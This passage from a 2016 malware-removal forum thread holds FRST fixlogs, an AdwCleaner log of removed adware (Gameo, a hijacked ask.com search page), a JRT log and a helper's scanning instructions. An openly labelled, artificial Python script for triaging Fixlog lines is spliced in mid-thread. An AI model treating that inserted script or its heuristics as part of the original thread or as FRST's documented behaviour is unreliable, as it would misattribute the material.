ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShortcutTarget: Curse.lnk -> C:\Users\MuhammadAkim\AppData\Roaming\Curse Client\Bin\Curse.exe (No File)
ShortcutTarget: MEGAsync.lnk -> C:\Users\MuhammadAkim\AppData\Local\MEGAsync\MEGAsync.exe (No File)
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = 
Task: {04C31380-2799-493E-A3C0-05D5EE7729AC} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {09E882AD-8DCF-47DC-B2B7-933BAA9151D6} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {3487E524-CC1E-40C1-A28C-FFB73CFCACC5} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {42524D92-B8DF-4B2B-ADB3-9BBE516AAC18} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {949DE924-F62B-451E-BEF7-D4FA0E42D772} - System32\Tasks\gameo_update => C:\Users\sesay\AppData\Roaming\Gameo\gameo.exe [2015-07-04] () <==== ATTENTION
C:\Users\sesay\AppData\Roaming\Gameo
Task: {C2E12A87-FAD3-4C99-AA05-CEBCCC871DA3} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {DFB6070B-F7D4-4F4A-862C-E18D88730BF4} - System32\Tasks\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179}
*****************
 
Error: (0) Failed to create a restore point.
Processes closed successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtPending => key could not remove. Access Denied.
HKCR\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => key could not remove. Access Denied.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSynced => key could not remove. Access Denied.
HKCR\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => key could not remove. Access Denied.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSyncing => key could not remove. Access Denied.
HKCR\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => key could not remove. Access Denied.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtPending => key could not remove. Access Denied.
HKCR\Wow6432Node\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => key not found. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSynced => key could not remove. Access Denied.
HKCR\Wow6432Node\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => key not found. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSyncing => key could not remove. Access Denied.
HKCR\Wow6432Node\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => key not found. 
C:\Users\MuhammadAkim\AppData\Roaming\Curse Client\Bin\Curse.exe => not found.
C:\Users\MuhammadAkim\AppData\Local\MEGAsync\MEGAsync.exe => not found.
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146} => key could not remove. Access Denied.
HKCR\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{04C31380-2799-493E-A3C0-05D5EE7729AC} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{09E882AD-8DCF-47DC-B2B7-933BAA9151D6} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3487E524-CC1E-40C1-A28C-FFB73CFCACC5} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{42524D92-B8DF-4B2B-ADB3-9BBE516AAC18} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{949DE924-F62B-451E-BEF7-D4FA0E42D772} => key could not remove. Access Denied.
Could not move "C:\WINDOWS\System32\Tasks\gameo_update" => Scheduled to move on reboot.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\gameo_update => key could not remove. Access Denied.
C:\Users\sesay\AppData\Roaming\Gameo => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C2E12A87-FAD3-4C99-AA05-CEBCCC871DA3} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DFB6070B-F7D4-4F4A-862C-E18D88730BF4} => key could not remove. Access Denied.
C:\WINDOWS\System32\Tasks\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179} => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179} => key could not remove. Access Denied.
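Added example (not part of the thread and not FRST's own code): a Python triage that classifies Fixlog result lines, flags a run that looks unelevated, and compares two runs. The sample strings are lines excerpted from the Run:2 and Run:3 Fixlogs in this thread; the function names and outcome labels are assumptions of this example.

```python
import re
from collections import Counter

# Result phrases as they appear in the Fixlogs posted in this thread.
OUTCOMES = [
    ("access_denied", re.compile(r"could not remove\. Access Denied\.$")),
    ("pending_reboot", re.compile(r"Scheduled to move on reboot\.$")),
    ("removed", re.compile(r"(key removed|moved) successfully$")),
    ("not_found", re.compile(r"not found\.$")),
]
REG_HIVES = ("HKLM\\", "HKCR\\", "HKU\\", "HKCU\\")

# Excerpt of the Run:2 Fixlog (run by a non-administrator account).
RUN2_EXCERPT = r'''
fixlist content:
*****************
Task: {949DE924-F62B-451E-BEF7-D4FA0E42D772} - System32\Tasks\gameo_update => C:\Users\sesay\AppData\Roaming\Gameo\gameo.exe [2015-07-04] () <==== ATTENTION
C:\Users\sesay\AppData\Roaming\Gameo
*****************

Error: (0) Failed to create a restore point.
Processes closed successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtPending => key could not remove. Access Denied.
HKCR\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => key could not remove. Access Denied.
HKCR\Wow6432Node\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => key not found. 
C:\Users\MuhammadAkim\AppData\Roaming\Curse Client\Bin\Curse.exe => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{949DE924-F62B-451E-BEF7-D4FA0E42D772} => key could not remove. Access Denied.
Could not move "C:\WINDOWS\System32\Tasks\gameo_update" => Scheduled to move on reboot.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\gameo_update => key could not remove. Access Denied.
C:\Users\sesay\AppData\Roaming\Gameo => moved successfully
'''

# Excerpt of the Run:3 Fixlog (same fixlist, different account).
RUN3_EXCERPT = r'''
*****************

Restore point was successfully created.
Processes closed successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtPending" => key removed successfully
"HKCR\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C}" => key removed successfully
C:\Users\MuhammadAkim\AppData\Roaming\Curse Client\Bin\Curse.exe => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{949DE924-F62B-451E-BEF7-D4FA0E42D772} => key not found. 
C:\WINDOWS\System32\Tasks\gameo_update => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\gameo_update => key not found. 
"C:\Users\sesay\AppData\Roaming\Gameo" => not found.
'''

def result_section(fixlog):
    """Lines after the echoed fixlist, which also contains '=>' entries."""
    lines = fixlog.splitlines()
    stars = [i for i, l in enumerate(lines) if re.fullmatch(r"\*{5,}", l.strip())]
    return lines[stars[-1] + 1:] if stars else lines

def parse_fixlog(fixlog):
    """Return [(target, outcome)] for every result line of a Fixlog."""
    entries = []
    for line in result_section(fixlog):
        line = line.strip()
        if "=>" not in line:
            continue
        target, _, verdict = line.partition("=>")
        target = target.strip()
        if target.startswith("Could not move "):
            target = target[len("Could not move "):]
        target = target.strip('"')
        verdict = verdict.strip()
        outcome = next((n for n, rx in OUTCOMES if rx.search(verdict)), "other")
        entries.append((target, outcome))
    return entries

def summarize(entries):
    return dict(Counter(outcome for _, outcome in entries))

def restore_point_created(fixlog):
    if "Restore point was successfully created." in fixlog:
        return True
    if "Failed to create a restore point." in fixlog:
        return False
    return None  # the fixlist did not ask for one, or the line is missing

def looks_unelevated(entries):
    """Registry deletions were denied and none succeeded."""
    reg = [o for t, o in entries if t.upper().startswith(REG_HIVES)]
    return "access_denied" in reg and "removed" not in reg

def compare_runs(before, after):
    """Track what happened to each target of an earlier run in a later one."""
    later = {t.casefold(): o for t, o in after}
    out = {"resolved": [], "contradicted": [], "still_open": []}
    for target, outcome in before:
        now = later.get(target.casefold())
        if outcome in ("access_denied", "pending_reboot"):
            key = "resolved" if now in ("removed", "not_found") else "still_open"
            out[key].append(target)
        elif outcome == "not_found" and now == "removed":
            # The earlier run reported a key as absent that was in fact present.
            out["contradicted"].append(target)
    return out

if __name__ == "__main__":
    run2, run3 = parse_fixlog(RUN2_EXCERPT), parse_fixlog(RUN3_EXCERPT)
    print("Run 2:", summarize(run2), "unelevated:", looks_unelevated(run2))
    print("Run 3:", summarize(run3), "unelevated:", looks_unelevated(run3))
    for bucket, targets in compare_runs(run2, run3).items():
        print(bucket, len(targets), targets)
```

The `contradicted` bucket is the part worth noting: a "key not found" result from a run that was also being denied access is not proof the key was absent.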
 
 


#10 Oh My!


Posted 02 February 2016 - 08:32 PM

Please run the fix again but this time when you launch FRST right click on the icon and select Run as administrator. Post the results.

Do you have the AdwCleaner log? You posted the Fixlog twice.
Gary
 

#11 Oh My!


Posted 05 February 2016 - 07:35 PM

Greetings,

===================================================

3 Day Bump

It has been more than 3 days since my last post.
  • Do you still need help with this?
  • If after 48hrs you have not replied to this thread then it will have to be closed.

Gary
 

#12 Alban18


Posted 05 February 2016 - 10:44 PM

Fix result of Farbar Recovery Scan Tool (x64) Version:27-01-2016
Ran by MuhammadAkim (2016-02-05 22:23:34) Run:3
Running from C:\Users\sesay\Desktop
Loaded Profiles: MuhammadAkim & sesay (Available Profiles: MuhammadAkim & abang & sesay & hakim)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CreateRestorePoint:
CloseProcesses:
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShortcutTarget: Curse.lnk -> C:\Users\MuhammadAkim\AppData\Roaming\Curse Client\Bin\Curse.exe (No File)
ShortcutTarget: MEGAsync.lnk -> C:\Users\MuhammadAkim\AppData\Local\MEGAsync\MEGAsync.exe (No File)
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = 
Task: {04C31380-2799-493E-A3C0-05D5EE7729AC} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {09E882AD-8DCF-47DC-B2B7-933BAA9151D6} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {3487E524-CC1E-40C1-A28C-FFB73CFCACC5} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {42524D92-B8DF-4B2B-ADB3-9BBE516AAC18} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {949DE924-F62B-451E-BEF7-D4FA0E42D772} - System32\Tasks\gameo_update => C:\Users\sesay\AppData\Roaming\Gameo\gameo.exe [2015-07-04] () <==== ATTENTION
C:\Users\sesay\AppData\Roaming\Gameo
Task: {C2E12A87-FAD3-4C99-AA05-CEBCCC871DA3} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {DFB6070B-F7D4-4F4A-862C-E18D88730BF4} - System32\Tasks\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179}
*****************
 
Restore point was successfully created.
Processes closed successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtPending" => key removed successfully
"HKCR\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSynced" => key removed successfully
"HKCR\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSyncing" => key removed successfully
"HKCR\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637}" => key removed successfully
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtPending" => key removed successfully
"HKCR\Wow6432Node\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C}" => key removed successfully
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSynced" => key removed successfully
"HKCR\Wow6432Node\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202}" => key removed successfully
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSyncing" => key removed successfully
"HKCR\Wow6432Node\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637}" => key removed successfully
C:\Users\MuhammadAkim\AppData\Roaming\Curse Client\Bin\Curse.exe => not found.
C:\Users\MuhammadAkim\AppData\Local\MEGAsync\MEGAsync.exe => not found.
"HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146}" => key removed successfully
HKCR\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{04C31380-2799-493E-A3C0-05D5EE7729AC}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{04C31380-2799-493E-A3C0-05D5EE7729AC}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{09E882AD-8DCF-47DC-B2B7-933BAA9151D6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{09E882AD-8DCF-47DC-B2B7-933BAA9151D6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3487E524-CC1E-40C1-A28C-FFB73CFCACC5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3487E524-CC1E-40C1-A28C-FFB73CFCACC5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{42524D92-B8DF-4B2B-ADB3-9BBE516AAC18}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{42524D92-B8DF-4B2B-ADB3-9BBE516AAC18}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{949DE924-F62B-451E-BEF7-D4FA0E42D772} => key not found. 
C:\WINDOWS\System32\Tasks\gameo_update => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\gameo_update => key not found. 
"C:\Users\sesay\AppData\Roaming\Gameo" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C2E12A87-FAD3-4C99-AA05-CEBCCC871DA3}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C2E12A87-FAD3-4C99-AA05-CEBCCC871DA3}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DFB6070B-F7D4-4F4A-862C-E18D88730BF4}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DFB6070B-F7D4-4F4A-862C-E18D88730BF4}" => key removed successfully
C:\WINDOWS\System32\Tasks\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179}" => key removed successfully
 
 
The system needed a reboot.
 
==== End of Fixlog 22:23:36 ====
 
 
 
# AdwCleaner v5.032 - Logfile created 02/02/2016 at 19:03:06
# Updated 31/01/2016 by Xplode
# Database : 2016-02-02.1 [Server]
# Operating system : Windows 10 Home  (x64)
# Username : MuhammadAkim - BASEMENT-PC
# Running from : C:\Users\sesay\Desktop\AdwCleaner.exe
# Option : Cleaning
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
[-] Folder Deleted : C:\Users\sesay\AppData\Local\Gameo
[-] Folder Deleted : C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\mppnoffgpafgpgbaigljliadgbnhljfl
[-] Folder Deleted : C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\nafaimnnclfjfedmmabolbppcngeolgf
[-] Folder Deleted : C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\oppjbdkgpfhhllancffaoaemplhkngoc
[-] Folder Deleted : C:\Users\sesay\AppData\Roaming\GoldenGate
[-] Folder Deleted : C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Gameo
 
***** [ Files ] *****
 
[-] File Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.html.lnk
[-] File Deleted : C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_mppnoffgpafgpgbaigljliadgbnhljfl_0.localstorage
[-] File Deleted : C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_mppnoffgpafgpgbaigljliadgbnhljfl_0.localstorage-journal
[-] File Deleted : C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gameo.lnk
[-] File Deleted : C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Play Games Online.url
[-] File Deleted : C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HowToRemove.html.lnk
[-] File Deleted : C:\Users\sesay\Desktop\gameo.lnk
[-] File Deleted : C:\Users\sesay\Desktop\Play Games Online.url
 
***** [ DLLs ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
[-] Task Deleted : gameo_update
 
***** [ Registry ] *****
 
[-] Key Deleted : HKCU\Software\OMX_Media
[-] Key Deleted : HKCU\Software\PRODUCTSETUP
[-] Key Deleted : HKCU\Software\yahooprovidedsearch
[-] Key Deleted : HKU\.DEFAULT\Software\ByteFence
[!] Key Not Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\Software\OMX_Media
[!] Key Not Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\Software\PRODUCTSETUP
[!] Key Not Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\Software\yahooprovidedsearch
[-] Key Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\gameo
[-] Key Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\GoldenGate
[-] Key Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\OMX_Media
[-] Key Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\PRODUCTSETUP
[-] Key Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\System Healer
[-] Key Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\yahooprovidedsearch
[-] Key Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\Microsoft\Windows\CurrentVersion\Uninstall\gameo
[-] Data Restored : HKCU\Software\Microsoft\Internet Explorer\Main [Secondary Start Pages]
[!] Data Not Restored : HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\Software\Microsoft\Internet Explorer\Main [Secondary Start Pages]
[-] Value Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\Microsoft\Windows\CurrentVersion\Run [Gameo]
[-] Value Deleted : HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [Gameo]
 
***** [ Web browsers ] *****
 
[-] [C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : aol.com
[-] [C:\Users\MuhammadAkim\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : ask.com
[-] [C:\Users\abang\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : aol.com
[-] [C:\Users\abang\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : ask.com
[-] [C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : aol.com
[-] [C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : ask.com
[-] [C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : dts.search.ask.com
[-] [C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : search.ask.com
[-] [C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Startup_URLs] Deleted : hxxp://www.search.ask.com/?o=APN10645A&gct=hp&d=406-679&v=n9092-93&t=4
[-] [C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : mppnoffgpafgpgbaigljliadgbnhljfl
[-] [C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : nafaimnnclfjfedmmabolbppcngeolgf
[-] [C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : oppjbdkgpfhhllancffaoaemplhkngoc
[-] [C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Homepage] Deleted : hxxp://www.search.ask.com/?o=APN10645A&gct=hp&d=406-679&v=n9092-93&t=4
[-] [C:\Users\hakim\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : aol.com
[-] [C:\Users\hakim\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : ask.com
 
*************************
 
:: "Tracing" keys removed
:: Winsock settings cleared
 
########## EOF - \AdwCleaner\AdwCleaner[C1].txt - [5777 bytes] ##########
 

 



#13 Oh My!

Posted 05 February 2016 - 10:54 PM

Let me know if there is any change after your last steps.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#14 Alban18

Posted 06 February 2016 - 03:56 PM

I ran jrt.exe a couple days ago but couldn't find the log file after I closed it.
So after running it today, the system is clean.
 
My cousin said he didn't experience the freezing anymore. He complained about the game lagging but that has to do with the computer performance.
 
I'm sorry to waste your time, since I think it was a trivial and small problem, but what was the reason this problem happened? Was it actually a virus? How can he prevent this from happening again?
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.2 (01.06.2016)
Operating System: Windows 10 Home x64 
Ran by MuhammadAkim (Administrator) on Sat 02/06/2016 at 15:48:36.67
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 0 
 
 
 
 
Registry: 0 
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sat 02/06/2016 at 15:51:12.78
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Thank you


#15 Oh My!

Posted 06 February 2016 - 04:40 PM

Systems can hang for a variety of reasons and in this case it is hard to tell why. There was a bit of junk detected and removed.

I would like to run 2 last things if you are able.

===================================================

ESET Online Scanner

--------------------

I'd like us to scan your machine with ESET OnlineScan. This process may take several hours; that is normal.
  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click Run ESET Online Scanner.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the icon on your desktop.
  • Check YES, I accept the Terms of Use.
  • Click the Start button.
  • Click Enable detection of potentially unwanted applications
  • Accept any security warnings from your browser.
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Copy and paste the information in your next reply. Note: If no malware was found you will not get a log.
  • Click the Back button.
  • Check Uninstall application on close and Delete quarantined files
  • Click the Finish button.
  • Close the ESET window and reboot your computer
===================================================

screen317's Security Check

--------------------
  • Please download screen317's Security Check to your desktop
  • Double-click icon to launch the program
  • Click OK
